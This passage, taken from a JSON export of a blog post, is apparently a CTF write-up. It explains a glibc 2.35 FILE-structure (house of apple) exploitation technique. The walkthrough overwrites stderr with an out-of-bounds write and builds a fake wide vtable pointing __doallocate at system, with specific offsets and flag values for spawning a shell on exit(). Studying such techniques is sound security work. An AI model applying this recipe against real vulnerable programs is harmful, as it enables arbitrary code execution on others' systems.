<strong><code>fp-&gt;_wide_data-&gt;_wide_vtable-&gt;__doallocate<\/code><\/strong>,<\/p>\n\n\n\n<p>and at that point <strong><code>rdi<\/code> is a pointer to the FILE structure itself (fp)<\/strong>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Therefore, even on glibc 2.35, a FILE structure attack path can be built as follows:<\/p>\n\n\n\n<p>For example, if we build a fake <code>wide_vtable<\/code> whose <code>__doallocate<\/code> entry points to <code>system<\/code>,<\/p>\n\n\n\n<p>then when <code>_IO_WDOALLOCATE(fp)<\/code> is called, it executes <strong><code>system(fp)<\/code><\/strong>.<\/p>\n\n\n\n<p>And if we arrange the contents of <code>fp<\/code> so that this runs <code>\"sh\"<\/code>,<\/p>\n\n\n\n<p><strong>we get a shell<\/strong>! \ud83d\ude04<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>But there is one problem to solve first:<\/p>\n\n\n\n<p><strong>How can we trigger <code>_IO_OVERFLOW<\/code>?<\/strong><\/p>\n\n\n\n<p>This is possible by <strong>abusing the exit feature, the third menu item of the binary<\/strong>.<\/p>\n\n\n\n<p>The detailed call chain behind this can be found in my earlier <strong>post on FILE structure attacks<\/strong>.<\/p>\n\n\n\n<p>In short, when exit is called, the binary follows this chain of function calls:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">exit\n|_ _IO_cleanup\n   |_ _IO_flush_all_lockp\n      Iterate list of available files (stderr->stdout->stdin), and on each iteration it will call:\n      |_ _IO_OVERFLOW (fp, EOF)<\/pre>\n\n\n\n<p>The following is the condition for calling <code>_IO_OVERFLOW<\/code> (excerpted from the <code>_IO_flush_all_lockp<\/code> code):<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>if (((fp-&gt;_mode &lt;= 0 &amp;&amp; fp-&gt;_IO_write_ptr &gt; fp-&gt;_IO_write_base))<\/code>\n<ul class=\"wp-block-list\">\n<li>That is, we set <code>_mode<\/code> to <code>0<\/code> and must satisfy <code>_IO_write_ptr &gt; _IO_write_base<\/code>.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Since calling <code>exit()<\/code> walks every open file,<\/p>\n\n\n\n<p><strong>I chose to overwrite the <code>stderr<\/code> FILE structure using the OOB (out-of-bounds) write bug<\/strong>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Summary of the settings to apply to the <code>stderr<\/code> structure to obtain RCE:<\/h3>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">1. Create a fake <code>_wide_vtable<\/code><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Location: <code>chunk_addr + 0x100<\/code> \u203b <code>chunk_addr<\/code> is at <code>libc_base - 0xf7ff0<\/code><\/li>\n\n\n\n<li>Since the offset of <code>__doallocate<\/code> is <code>0x68<\/code>, store the address of <code>system<\/code> at <code>chunk_addr + 0x100 + 0x68<\/code><\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">2. Create a fake <code>_wide_data<\/code><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Location: <code>chunk_addr<\/code><\/li>\n\n\n\n<li><code>chunk_addr-&gt;_IO_write_base<\/code> \u2192 set to <code>0<\/code><\/li>\n\n\n\n<li><code>chunk_addr-&gt;_IO_buf_base<\/code> \u2192 set to <code>0<\/code><\/li>\n\n\n\n<li><code>chunk_addr-&gt;_wide_vtable<\/code> \u2192 <code>chunk_addr + 0x100<\/code> (the address of the fake vtable)<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">3. Set <code>stderr-&gt;_flags<\/code> appropriately<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Key points:\n<ul class=\"wp-block-list\">\n<li>At the end, <code>wide_vtable-&gt;__doallocate(stderr)<\/code> \u2192 <code>system(stderr)<\/code> is called<\/li>\n\n\n\n<li>That is, <code>stderr-&gt;_flags<\/code> becomes the start of the string passed to <code>system<\/code> as its argument<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>Tricks for running the desired command while still satisfying the conditions:\n<ul class=\"wp-block-list\">\n<li><strong>kylebot<\/strong>'s approach:\n<ul class=\"wp-block-list\">\n<li>Set <code>_flags<\/code> to <code>0x3b01010101010101<\/code><\/li>\n\n\n\n<li>Store <code>\"\/bin\/sh\\\\x00\"<\/code> in <code>_IO_read_ptr<\/code><\/li>\n\n\n\n<li>In this case the command that finally runs is <code>system(\"\\\\x01\\\\x01\\\\x01\\\\x01\\\\x01\\\\x01\\\\x01;\/bin\/sh\")<\/code> \u2192 a shell is spawned<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>roderick01<\/strong>'s approach:\n<ul class=\"wp-block-list\">\n<li>Set <code>_flags<\/code> to <code>\" sh\"<\/code> (a string with two leading spaces)<\/li>\n\n\n\n<li>The conditions are satisfied and <code>system(\" sh\")<\/code> is called<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">4. Other <code>stderr<\/code> field settings<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>_IO_write_base<\/code> \u2192 <code>0<\/code><\/li>\n\n\n\n<li><code>_IO_write_ptr<\/code> \u2192 <code>1<\/code>\n<ul class=\"wp-block-list\">\n<li>This makes <code>_IO_flush_all_lockp()<\/code> call <code>_IO_OVERFLOW(stderr, EOF)<\/code> on <code>stderr<\/code> when <code>exit()<\/code> is called<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><code>stderr-&gt;vtable<\/code> \u2192 set to <code>_IO_wfile_jumps<\/code>\n<ul class=\"wp-block-list\">\n<li>This causes <code>_IO_wfile_overflow<\/code> to be called instead of the original <code>_IO_new_file_overflow<\/code><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Once the <code>stderr<\/code> FILE structure has been manipulated like this,<\/p>\n\n\n\n<p><strong>a shell is obtained automatically when <code>exit()<\/code> is called<\/strong>!<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[19],"tags":[33,49,25],"class_list":["post-3359","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-fsop","tag-house-of-apple","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3359","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3359"}],"version-history":[{"count":4,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3359\/revisions"}],"predecessor-version":[{"id":3365,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3359\/revisions\/3365"}],"wp:attachment":[{"href":"https:\/\/h4c
k.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3359"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3359"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3359"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}